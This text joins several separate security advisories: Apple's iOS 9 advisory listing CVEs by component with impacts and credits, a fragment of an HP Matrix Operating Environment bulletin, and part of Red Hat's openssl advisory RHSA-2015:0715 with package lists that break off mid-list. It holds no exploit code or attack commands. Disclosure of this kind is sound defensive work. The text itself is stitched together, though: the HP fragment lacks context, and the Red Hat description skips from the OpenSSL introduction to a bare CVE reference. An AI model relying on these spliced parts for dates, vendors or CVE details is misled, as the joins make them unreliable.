CFNetwork Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A person with physical access to an iOS device may read cache data from Apple apps Description: Cache data was encrypted with a key protected only by the hardware UID. This issue was addressed by encrypting the cache data with a key protected by the hardware UID and the user's passcode. CVE-ID CVE-2015-5898 : Andreas Kurtz of NESO Security Labs
CFNetwork Cookies Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An attacker in a privileged network position can track a user's activity Description: A cross-domain cookie issue existed in the handling of top level domains. The issue was address through improved restrictions of cookie creation. CVE-ID CVE-2015-5885 : Xiaofeng Zheng of Blue Lotus Team, Tsinghua University
CFNetwork Cookies Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An attacker may be able to create unintended cookies for a website Description: WebKit would accept multiple cookies to be set in the document.cookie API. This issue was addressed through improved parsing. CVE-ID CVE-2015-3801 : Erling Ellingsen of Facebook
CFNetwork FTPProtocol Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Malicious FTP servers may be able to cause the client to perform reconnaissance on other hosts Description: An issue existed in FTP packet handling if clients were using an FTP proxy. CVE-ID CVE-2015-5912 : Amit Klein
CFNetwork HTTPProtocol Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A maliciously crafted URL may be able to bypass HTTP Strict Transport Security (HSTS) and leak sensitive data Description: A URL parsing vulnerability existed in HSTS handling. This issue was addressed through improved URL parsing. CVE-ID CVE-2015-5858 : Xiaofeng Zheng of Blue Lotus Team, Tsinghua University
CFNetwork HTTPProtocol Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A malicious website may be able to track users in Safari private browsing mode Description: An issue existed in the handling of HSTS state in Safari private browsing mode. This issue was addressed through improved state handling. CVE-ID CVE-2015-5860 : Sam Greenhalgh of RadicalResearch Ltd
CFNetwork Proxies Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Connecting to a malicious web proxy may set malicious cookies for a website Description: An issue existed in the handling of proxy connect responses. This issue was addressed by removing the set-cookie header while parsing the connect response. CVE-ID CVE-2015-5841 : Xiaofeng Zheng of Blue Lotus Team, Tsinghua University
CFNetwork SSL Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An attacker with a privileged network position may intercept SSL/TLS connections Description: A certificate validation issue existed in NSURL when a certificate changed. This issue was addressed through improved certificate validation. CVE-ID CVE-2015-5824 : Timothy J. Wood of The Omni Group
CFNetwork SSL Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An attacker may be able to decrypt data protected by SSL Description: There are known attacks on the confidentiality of RC4. An attacker could force the use of RC4, even if the server preferred better ciphers, by blocking TLS 1.0 and higher connections until CFNetwork tried SSL 3.0, which only allows RC4. This issue was addressed by removing the fallback to SSL 3.0.
CoreAnimation Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A malicious application may be able to leak sensitive user information Description: Applications could access the screen framebuffer while they were in the background. This issue was addressed with improved access control on IOSurfaces. CVE-ID CVE-2015-5880 : Jin Han, Su Mon Kywe, Qiang Yan, Robert Deng, Debin Gao, Yingjiu Li of School of Information Systems Singapore Management University, Feng Bao and Jianying Zhou of Cryptography and Security Department Institute for Infocomm Research
CoreCrypto Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An attacker may be able to determine a private key Description: By observing many signing or decryption attempts, an attacker may have been able to determine the RSA private key. This issue was addressed using improved encryption algorithms.
CoreText Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: A memory corruption issue existed in the processing of font files. This issue was addressed through improved input validation. CVE-ID CVE-2015-5874 : John Villamil (@day6reak), Yahoo Pentest Team
Data Detectors Engine Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Processing a maliciously crafted text file may lead to arbitrary code execution Description: Memory corruption issues existed in the processing of text files. These issues were addressed through improved bounds checking. CVE-ID CVE-2015-5829 : M1x7e1 of Safeye Team (www.safeye.org)
Dev Tools Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A malicious application may be able to execute arbitrary code with system privileges Description: A memory corruption issue existed in dyld. This was addressed through improved memory handling. CVE-ID CVE-2015-5876 : beist of grayhash
dyld Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An application may be able to bypass code signing Description: An issue existed with validation of the code signature of executables. This issue was addressed through improved bounds checking. CVE-ID CVE-2015-5839 : @PanguTeam, TaiG Jailbreak Team
Disk Images Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A local user may be able to execute arbitrary code with system privileges Description: A memory corruption issue existed in DiskImages. This issue was addressed through improved memory handling. CVE-ID CVE-2015-5847 : Filippo Bigarella, Luca Todesco
Game Center Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A malicious Game Center application may be able to access a player's email address Description: An issue existed in Game Center in the handling of a player's email. This issue was addressed through improved access restrictions. CVE-ID CVE-2015-5855 : Nasser Alnasser
ICU Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Multiple vulnerabilities in ICU Description: Multiple vulnerabilities existed in ICU versions prior to 53.1.0. These issues were addressed by updating ICU to version 55.1. CVE-ID CVE-2014-8146 CVE-2015-1205
IOAcceleratorFamily Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A malicious application may be able to determine kernel memory layout Description: An issue existed that led to the disclosure of kernel memory content. This issue was addressed through improved bounds checking. CVE-ID CVE-2015-5834 : Cererdlong of Alibaba Mobile Security Team
IOAcceleratorFamily Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A local user may be able to execute arbitrary code with system privileges Description: A memory corruption issue existed in IOAcceleratorFamily. This issue was addressed through improved memory handling. CVE-ID CVE-2015-5848 : Filippo Bigarella
IOHIDFamily Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A malicious application may be able to execute arbitrary code with system privileges Description: A memory corruption issue existed in IOHIDFamily. This issue was addressed through improved memory handling. CVE-ID CVE-2015-5867 : moony li of Trend Micro
IOKit Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A malicious application may be able to execute arbitrary code with system privileges Description: A memory corruption issue existed in the kernel. This issue was addressed through improved memory handling. CVE-ID CVE-2015-5844 : Filippo Bigarella CVE-2015-5845 : Filippo Bigarella CVE-2015-5846 : Filippo Bigarella
IOMobileFrameBuffer Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A local user may be able to execute arbitrary code with system privileges Description: A memory corruption issue existed in IOMobileFrameBuffer. This issue was addressed through improved memory handling. CVE-ID CVE-2015-5843 : Filippo Bigarella
IOStorageFamily Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A local attacker may be able to read kernel memory Description: A memory initialization issue existed in the kernel. This issue was addressed through improved memory handling. CVE-ID CVE-2015-5863 : Ilja van Sprundel of IOActive
iTunes Store Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: AppleID credentials may persist in the keychain after sign out Description: An issue existed in keychain deletion. This issue was addressed through improved account cleanup. CVE-ID CVE-2015-5832 : Kasif Dekel from Check Point Software Technologies
JavaScriptCore Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Visiting a maliciously crafted website may lead to arbitrary code execution Description: Memory corruption issues existed in WebKit. These issues were addressed through improved memory handling. CVE-ID CVE-2015-5791 : Apple CVE-2015-5793 : Apple CVE-2015-5814 : Apple CVE-2015-5816 : Apple CVE-2015-5822 : Mark S. Miller of Google CVE-2015-5823 : Apple
Kernel Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A local user may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue existed in the kernel. This issue was addressed through improved memory handling. CVE-ID CVE-2015-5868 : Cererdlong of Alibaba Mobile Security Team CVE-2015-5896 : Maxime Villard of m00nbsd CVE-2015-5903 : CESG
Kernel Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A local attacker may control the value of stack cookies Description: Multiple weaknesses existed in the generation of user space stack cookies. This was addressed through improved generation of stack cookies. CVE-ID CVE-2013-3951 : Stefan Esser
Kernel Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A local process can modify other processes without entitlement checks Description: An issue existed where root processes using the processor_set_tasks API were allowed to retrieve the task ports of other processes. This issue was addressed through added entitlement checks. CVE-ID CVE-2015-5882 : Pedro Vilaca, working from original research by Ming- chieh Pan and Sung-ting Tsai; Jonathan Levin
Kernel Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An attacker may be able to launch denial of service attacks on targeted TCP connections without knowing the correct sequence number Description: An issue existed in xnu's validation of TCP packet headers. This issues was addressed through improved TCP packet header validation. CVE-ID CVE-2015-5879 : Jonathan Looney
Kernel Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An attacker in a local LAN segment may disable IPv6 routing Description: An insufficient validation issue existed in handling of IPv6 router advertisements that allowed an attacker to set the hop limit to an arbitrary value. This issue was addressed by enforcing a minimum hop limit. CVE-ID CVE-2015-5869 : Dennis Spindel Ljungmark
Kernel Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A local user may be able to determine kernel memory layout Description: An issue existed in XNU that led to the disclosure of kernel memory. This was addressed through improved initialization of kernel memory structures. CVE-ID CVE-2015-5842 : beist of grayhash
Kernel Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A local user may be able to cause a system denial of service Description: An issue existed in HFS drive mounting. This was addressed by additional validation checks. CVE-ID CVE-2015-5748 : Maxime Villard of m00nbsd
libc Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A local user may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue existed in the kernel. This issue was addressed through improved memory handling. CVE-ID CVE-2014-8611 : Adrian Chadd and Alfred Perlstein of Norse Corporation
libpthread Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A local user may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue existed in the kernel. This issue was addressed through improved memory handling. CVE-ID CVE-2015-5899 : Lufeng Li of Qihoo 360 Vulcan Team
Mail Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An attacker can send an email that appears to come from a contact in the recipient's address book Description: An issue existed in the handling of the sender's address. This issue was addressed through improved validation. CVE-ID CVE-2015-5857 : Emre Saglam of salesforce.com
Multipeer Connectivity Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A local attacker may be able to observe unprotected multipeer data Description: An issue existed in convenience initializer handling in which encryption could be actively downgraded to a non-encrypted session. This issue was addressed by changing the convenience initializer to require encryption. CVE-ID CVE-2015-5851 : Alban Diquet (@nabla_c0d3) of Data Theorem
NetworkExtension Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A malicious application may be able to determine kernel memory layout Description: An uninitialized memory issue in the kernel led to the disclosure of kernel memory content. This issue was addressed through memory initialization. CVE-ID CVE-2015-5831 : Maxime Villard of m00nbsd
OpenSSL Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Multiple vulnerabilities in OpenSSL Description: Multiple vulnerabilities existed in OpenSSL versions prior to 0.9.8zg. These were addressed by updating OpenSSL to version 0.9.8zg. CVE-ID CVE-2015-0286 CVE-2015-0287
PluginKit Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A malicious enterprise application can install extensions before the application has been trusted Description: An issue existed in the validation of extensions during installation. This was addressed through improved app verification. CVE-ID CVE-2015-5837 : Zhaofeng Chen, Hui Xue, and Tao (Lenx) Wei of FireEye, Inc.
removefile Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Processing malicious data may lead to unexpected application termination Description: An overflow fault existed in the checkint division routines. This issue was addressed with improved division routines. CVE-ID CVE-2015-5840 : an anonymous researcher
Safari Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A local user may be able to read Safari bookmarks on a locked iOS device without a passcode Description: Safari bookmark data was encrypted with a key protected only by the hardware UID. This issue was addressed by encrypting the Safari bookmark data with a key protected by the hardware UID and the user's passcode. CVE-ID CVE-2015-5903 : Jonathan Zdziarski
Safari Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Visiting a malicious website may lead to user interface spoofing Description: An issue may have allowed a website to display content with a URL from a different website. This issue was addressed through improved URL handling. CVE-ID CVE-2015-5904 : Erling Ellingsen of Facebook, Lukasz Pilorz
Safari Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Visiting a malicious website may lead to user interface spoofing Description: Navigating to a malicious website with a malformed window opener may have allowed the display of arbitrary URLs. This issue was addressed through improved handling of window openers. CVE-ID CVE-2015-5905 : Keita Haga of keitahaga.com
Safari Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Users may be tracked by malicious websites using client certificates Description: An issue existed in Safari's client certificate matching for SSL authentication. This issue was addressed through improved matching of valid client certificates. CVE-ID CVE-2015-1129 : Stefan Kraus of fluid Operations AG, Sylvain Munaut of Whatever s.a.
Safari Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Visiting a malicious website may lead to user interface spoofing Description: Multiple user interface inconsistencies may have allowed a malicious website to display an arbitrary URL. These issues were addressed through improved URL display logic. CVE-ID CVE-2015-5764 : Antonio Sanso (@asanso) of Adobe CVE-2015-5765 : Ron Masas CVE-2015-5767 : Krystian Kloskowski via Secunia, Masato Kinugawa
Safari Safe Browsing Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Navigating to the IP address of a known malicious website may not trigger a security warning Description: Safari's Safe Browsing feature did not warn users when visiting known malicious websites by their IP addresses. The issue was addressed through improved malicious site detection. Rahul M of TagsDoc
Security Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A malicious app may be able to intercept communication between apps Description: An issue existed that allowed a malicious app to intercept URL scheme communication between apps. This was mitigated by displaying a dialog when a URL scheme is used for the first time. CVE-ID CVE-2015-5835 : Teun van Run of FiftyTwoDegreesNorth B.V.; XiaoFeng Wang of Indiana University, Luyi Xing of Indiana University, Tongxin Li of Peking University, Tongxin Li of Peking University, Xiaolong Bai of Tsinghua University
Siri Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A person with physical access to an iOS device may be able to use Siri to read notifications of content that is set not to be displayed at the lock screen Description: When a request was made to Siri, client side restrictions were not being checked by the server. This issue was addressed through improved restriction checking. CVE-ID CVE-2015-5892 : Robert S Mozayeni, Joshua Donvito
SpringBoard Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A person with physical access to an iOS device can reply to an audio message from the lock screen when message previews from the lock screen are disabled Description: A lock screen issue allowed users to reply to audio messages when message previews were disabled. This issue was addressed through improved state management. CVE-ID CVE-2015-5861 : Daniel Miedema of Meridian Apps
SpringBoard Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A malicious application may be able to spoof another application's dialog windows Description: An access issue existed with privileged API calls. This issue was addressed through additional restrictions. CVE-ID CVE-2015-5838 : Min (Spark) Zheng, Hui Xue, Tao (Lenx) Wei, John C.S. Lui
SQLite Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Multiple vulnerabilities in SQLite v3.8.5 Description: Multiple vulnerabilities existed in SQLite v3.8.5. These issues were addressed by updating SQLite to version 3.8.10.2. CVE-ID CVE-2015-5895
tidy Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Visiting a maliciously crafted website may lead to arbitrary code execution Description: A memory corruption issue existed in Tidy. This issues was addressed through improved memory handling. CVE-ID CVE-2015-5522 : Fernando Munoz of NULLGroup.com CVE-2015-5523 : Fernando Munoz of NULLGroup.com
WebKit Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Object references may be leaked between isolated origins on custom events, message events and pop state events Description: An object leak issue broke the isolation boundary between origins. This issue was addressed through improved isolation between origins. CVE-ID CVE-2015-5827 : Gildas
WebKit Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Visiting a maliciously crafted website may lead to arbitrary code execution Description: Memory corruption issues existed in WebKit. These issues were addressed through improved memory handling. CVE-ID CVE-2015-5789 : Apple CVE-2015-5790 : Apple CVE-2015-5792 : Apple CVE-2015-5794 : Apple CVE-2015-5795 : Apple CVE-2015-5796 : Apple CVE-2015-5797 : Apple CVE-2015-5799 : Apple CVE-2015-5800 : Apple CVE-2015-5801 : Apple CVE-2015-5802 : Apple CVE-2015-5803 : Apple CVE-2015-5804 : Apple CVE-2015-5805 CVE-2015-5806 : Apple CVE-2015-5807 : Apple CVE-2015-5809 : Apple CVE-2015-5810 : Apple CVE-2015-5811 : Apple CVE-2015-5812 : Apple CVE-2015-5813 : Apple CVE-2015-5817 : Apple CVE-2015-5818 : Apple CVE-2015-5819 : Apple CVE-2015-5821 : Apple
WebKit Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Visiting a malicious website may lead to unintended dialing Description: An issue existed in handling of tel://, facetime://, and facetime-audio:// URLs. This issue was addressed through improved URL handling. CVE-ID CVE-2015-5820 : Andrei Neculaesei, Guillaume Ross
WebKit Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: QuickType may learn the last character of a password in a filled-in web form Description: An issue existed in WebKit's handling of password input context. This issue was addressed through improved input context handling. CVE-ID CVE-2015-5906 : Louis Romero of Google Inc.
WebKit Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An attacker in a privileged network position may be able to redirect to a malicious domain Description: An issue existed in the handling of resource caches on sites with invalid certificates. The issue was addressed by rejecting the application cache of domains with invalid certificates. CVE-ID CVE-2015-5907 : Yaoqi Jia of National University of Singapore (NUS)
WebKit Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A malicious website may exfiltrate data cross-origin Description: Safari allowed cross-origin stylesheets to be loaded with non-CSS MIME types which could be used for cross-origin data exfiltration. This issue was addressed by limiting MIME types for cross-origin stylesheets. CVE-ID CVE-2015-5826 : filedescriptor, Chris Evans
WebKit Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: The Performance API may allow a malicious website to leak browsing history, network activity, and mouse movements Description: WebKit's Performance API could have allowed a malicious website to leak browsing history, network activity, and mouse movements by measuring time. This issue was addressed by limiting time resolution. CVE-ID CVE-2015-5825 : Yossi Oren et al. of Columbia University's Network Security Lab
WebKit Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An attacker in a privileged network position may be able to leak sensitive user information Description: An issue existed with Content-Disposition headers containing type attachment. This issue was addressed by disallowing some functionality for type attachment pages. CVE-ID CVE-2015-5921 : Mickey Shkatov of the Intel(r) Advanced Threat Research Team, Daoyuan Wu of Singapore Management University, Rocky K. C. Chang of Hong Kong Polytechnic University, Lukasz Pilorz, superhei of www.knownsec.com
WebKit Canvas Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Visiting a malicious website may disclose image data from another website Description: A cross-origin issue existed with "canvas" element images in WebKit. This was addressed through improved tracking of security origins. CVE-ID CVE-2015-5788 : Apple
WebKit Page Loading Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: WebSockets may bypass mixed content policy enforcement Description: An insufficient policy enforcement issue allowed WebSockets to load mixed content. This issue was addressed by extending mixed content policy enforcement to WebSockets. Kevin G Jones of Higher Logic
Installation note:
This update is available through iTunes and Software Update on your iOS device, and will not appear in your computer's Software Update application, or in the Apple Downloads site. Make sure you have an Internet connection and have installed the latest version of iTunes from www.apple.com/itunes/
iTunes and Software Update on the device will automatically check Apple's update server on its weekly schedule. When an update is detected, it is downloaded and the option to be installed is presented to the user when the iOS device is docked. We recommend applying the update immediately if possible. Selecting Don't Install will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the day that iTunes or the device checks for updates. You may manually obtain the update via the Check for Updates button within iTunes, or the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
- Navigate to Settings
- Select General
- Select About. The version after applying this update will be "9".
Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE----- Comment: GPGTools - http://gpgtools.org
iQIcBAEBCAAGBQJV+avFAAoJEBcWfLTuOo7tAOsQAKVBs+YG3HuMy0mc0rnpbRtU +bjdnzwBeQE6C6Fp/SlZroyYtutnPw9QoFbUpY9Kkcer08uPap6kUAcF72fD51tG UYmIe5WvDSMWD98pKsgDGUVfGdU1h135KpSfDgoiQrZK2GAPe2xCDupD42jIPLk2 3qSyrYnVzfrCZ8uBk9j4gqoF5Ki6JSP/3Qm7hiPfhQXcMyQyIQ+2tJyQcSyGf5OM RgkmHwjIjkEb8jwwQ6h4LPMNuvqq8Kv6P4wQQeUl7RdtLJfafmFg+mV7bSmV/b28 Hk5EHQrQJ5fVl9jBFxti6aZrhrNr5yRL9yAdrpNB0rWfDN0z9emyGRrW2vli+Zv+ 0xXBZfAiNVAP53ou4gyVkLDZ+zx5lsWSADU1QWbIR2DY+WXUIN5QJ/ayFkNN9gqD WrFGHOc/l+Rq82uQi4ND0jTcYqhBG0MyooJf29orPA2tZeKvrcA4/6w12w6eJ7qA aW5J+BByErqWft42I/JT3CbnK+GBEDHnj4GAeSMHuNolPNsoH5cv0G4yKigW0zLS 81AzADTcBtKtaSD9aBAPAL6TTGUySmupF8flhHTMcpZh1MbAqo+bObMXUMvCrmST yq+5/R0gVuMN0BQ7adwI0akYApuqrNi/Mp9zT+JlU2wiSfaHm58Ugf8YAmc+sfjT rHWi1bvzskkrxRfuQ4mX =MnPh -----END PGP SIGNATURE----- .
Release Date: 2015-08-24 Last Updated: 2015-08-24
Potential Security Impact: Remote unauthorized modification, unauthorized access, or unauthorized disclosure of information. Please order the latest version of the HP Matrix Operating Environment 7.5.0 DVD #2 ISO from the following location:
http://www.hp.com/go/insightupdates
Choose the orange Select button. This presents the HP Insight Management Media order page. Choose Insight Management 7.5 DVD-2-ZIP August 2015 from the Software specification list. Fill out the rest of the form and submit it.
HP has addressed these vulnerabilities for the affected software components bundled with the HP Matrix Operating Environment in the following HP Security Bulletins. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Moderate: openssl security update Advisory ID: RHSA-2015:0715-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-0715.html Issue date: 2015-03-23 CVE Names: CVE-2015-0209 CVE-2015-0286 CVE-2015-0287 CVE-2015-0288 CVE-2015-0289 CVE-2015-0292 CVE-2015-0293 =====================================================================
- Summary:
Updated openssl packages that fix multiple security issues are now available for Red Hat Enterprise Linux 6.
Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64
- Description:
OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols, as well as a full-strength, general purpose cryptography library. (CVE-2015-0286)
An integer underflow flaw, leading to a buffer overflow, was found in the way OpenSSL decoded malformed Base64-encoded inputs. Note: this flaw is not exploitable via the TLS/SSL protocol because the data being transferred is not Base64-encoded. (CVE-2015-0292)
A denial of service flaw was found in the way OpenSSL handled SSLv2 handshake messages. A remote attacker could use this flaw to cause a TLS/SSL server using OpenSSL to exit on a failed assertion if it had both the SSLv2 protocol and EXPORT-grade cipher suites enabled. (CVE-2015-0293)
A use-after-free flaw was found in the way OpenSSL imported malformed Elliptic Curve private keys. A specially crafted key file could cause an application using OpenSSL to crash when imported. (CVE-2015-0209)
An out-of-bounds write flaw was found in the way OpenSSL reused certain ASN.1 structures. An attacker able to make an application using OpenSSL verify, decrypt, or parse a specially crafted PKCS#7 input could cause that application to crash. (CVE-2015-0289)
Red Hat would like to thank the OpenSSL project for reporting CVE-2015-0286, CVE-2015-0287, CVE-2015-0288, CVE-2015-0289, CVE-2015-0292, and CVE-2015-0293. For the update to take effect, all services linked to the OpenSSL library must be restarted, or the system rebooted.
- Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source: openssl-1.0.1e-30.el6_6.7.src.rpm
i386: openssl-1.0.1e-30.el6_6.7.i686.rpm openssl-debuginfo-1.0.1e-30.el6_6.7.i686.rpm
x86_64: openssl-1.0.1e-30.el6_6.7.i686.rpm openssl-1.0.1e-30.el6_6.7.x86_64.rpm openssl-debuginfo-1.0.1e-30.el6_6.7.i686.rpm openssl-debuginfo-1.0.1e-30.el6_6.7.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
i386: openssl-debuginfo-1.0.1e-30.el6_6.7.i686.rpm openssl-devel-1.0.1e-30.el6_6.7.i686.rpm openssl-perl-1.0.1e-30.el6_6.7.i686.rpm openssl-static-1.0.1e-30.el6_6.7.i686.rpm
x86_64: openssl-debuginfo-1.0.1e-30.el6_6.7.i686.rpm openssl-debuginfo-1.0.1e-30.el6_6.7.x86_64.rpm openssl-devel-1.0.1e-30.el6_6.7.i686.rpm openssl-devel-1.0.1e-30.el6_6.7.x86_64.rpm openssl-perl-1.0.1e-30.el6_6.7.x86_64.rpm openssl-static-1.0.1e-30.el6_6.7.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source: openssl-1.0.1e-30.el6_6.7.src.rpm
x86_64: openssl-1.0.1e-30.el6_6.7.i686.rpm openssl-1.0.1e-30.el6_6.7.x86_64.rpm openssl-debuginfo-1.0.1e-30.el6_6.7.i686.rpm openssl-debuginfo-1.0.1e-30.el6_6.7.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
x86_64: openssl-debuginfo-1.0.1e-30.el6_6.7.i686.rpm openssl-debuginfo-1.0.1e-30.el6_6.7.x86_64.rpm openssl-devel-1.0.1e-30.el6_6.7.i686.rpm openssl-devel-1.0.1e-30.el6_6.7.x86_64.rpm openssl-perl-1.0.1e-30.el6_6.7.x86_64.rpm openssl-static-1.0.1e-30.el6_6.7.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source: openssl-1.0.1e-30.el6_6.7.src.rpm
i386: openssl-1.0.1e-30.el6_6.7.i686.rpm openssl-debuginfo-1.0.1e-30.el6_6.7.i686.rpm openssl-devel-1.0.1e-30.el6_6.7.i686.rpm
ppc64: openssl-1.0.1e-30.el6_6.7.ppc.rpm openssl-1.0.1e-30.el6_6.7.ppc64.rpm openssl-debuginfo-1.0.1e-30.el6_6.7.ppc.rpm openssl-debuginfo-1.0.1e-30.el6_6.7.ppc64.rpm openssl-devel-1.0.1e-30.el6_6.7.ppc.rpm openssl-devel-1.0.1e-30.el6_6.7.ppc64.rpm
s390x: openssl-1.0.1e-30.el6_6.7.s390.rpm openssl-1.0.1e-30.el6_6.7.s390x.rpm openssl-debuginfo-1.0.1e-30.el6_6.7.s390.rpm openssl-debuginfo-1.0.1e-30.el6_6.7.s390x.rpm openssl-devel-1.0.1e-30.el6_6.7.s390.rpm openssl-devel-1.0.1e-30.el6_6.7.s390x.rpm
x86_64: openssl-1.0.1e-30.el6_6.7.i686.rpm openssl-1.0.1e-30.el6_6.7.x86_64.rpm openssl-debuginfo-1.0.1e-30.el6_6.7.i686.rpm openssl-debuginfo-1.0.1e-30.el6_6.7.x86_64.rpm openssl-devel-1.0.1e-30.el6_6.7.i686.rpm openssl-devel-1.0.1e-30.el6_6.7.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
i386: openssl-debuginfo-1.0.1e-30.el6_6.7.i686.rpm openssl-perl-1.0.1e-30.el6_6.7.i686.rpm openssl-static-1.0.1e-30.el6_6.7.i686.rpm
ppc64: openssl-debuginfo-1.0.1e-30.el6_6.7.ppc64.rpm openssl-perl-1.0.1e-30.el6_6.7.ppc64.rpm openssl-static-1.0.1e-30.el6_6.7.ppc64.rpm
s390x: openssl-debuginfo-1.0.1e-30.el6_6.7.s390x.rpm openssl-perl-1.0.1e-30.el6_6.7.s390x.rpm openssl-static-1.0.1e-30.el6_6.7.s390x.rpm
x86_64: openssl-debuginfo-1.0.1e-30.el6_6.7.x86_64.rpm openssl-perl-1.0.1e-30.el6_6.7.x86_64.rpm openssl-static-1.0.1e-30.el6_6.7.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source: openssl-1.0.1e-30.el6_6.7.src.rpm
i386: openssl-1.0.1e-30.el6_6.7.i686.rpm openssl-debuginfo-1.0.1e-30.el6_6.7.i686.rpm openssl-devel-1.0.1e-30.el6_6.7.i686.rpm
